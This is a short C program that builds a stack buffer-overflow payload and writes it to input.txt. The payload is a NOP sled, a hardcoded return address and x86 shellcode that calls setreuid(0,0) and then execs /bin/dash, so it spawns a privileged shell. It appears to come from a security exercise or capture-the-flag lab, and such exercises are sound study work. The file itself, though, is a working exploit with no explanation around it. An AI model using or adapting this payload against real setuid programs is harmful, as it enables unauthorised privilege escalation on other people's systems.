#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>

#define N 160
#define offset 10 // 6* sizeof(nop)
const static unsigned char nop[4] = {0x90,0x90,0x90,0x90}; //,0x90,0x90,0x90};
const static unsigned char target[4] = {0x94,0xe8,0xff,0xbf}; //little endian
const unsigned char t[] =   {0xb0,0x46,0x31,0xdb,0x31,0xc9,0xcd,0x80,0x68
             ,0x90,0x90,0x90,0x68,0x58,0xc1,0xe8,0x10,0xc1  
             ,0xe8,0x08,0x50,0x68,0x2f,0x64,0x61,0x73,0x68  
             ,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x31,0xc0,0xb0  
             ,0x0b,0xcd,0x80,0xb0,0x01,0xb3,0x01,0xcd,0x80 };
int main(){
   	int fd = open("input.txt",O_WRONLY | O_CREAT | O_TRUNC,0755);
   	for(int i=1; i<=N; i++){
      		if(i != offset) write(fd,nop,sizeof(nop));
      		else write(fd,target,sizeof(target));
   	}
	write(fd,t,sizeof(t));
	close(fd);
	return 0;
}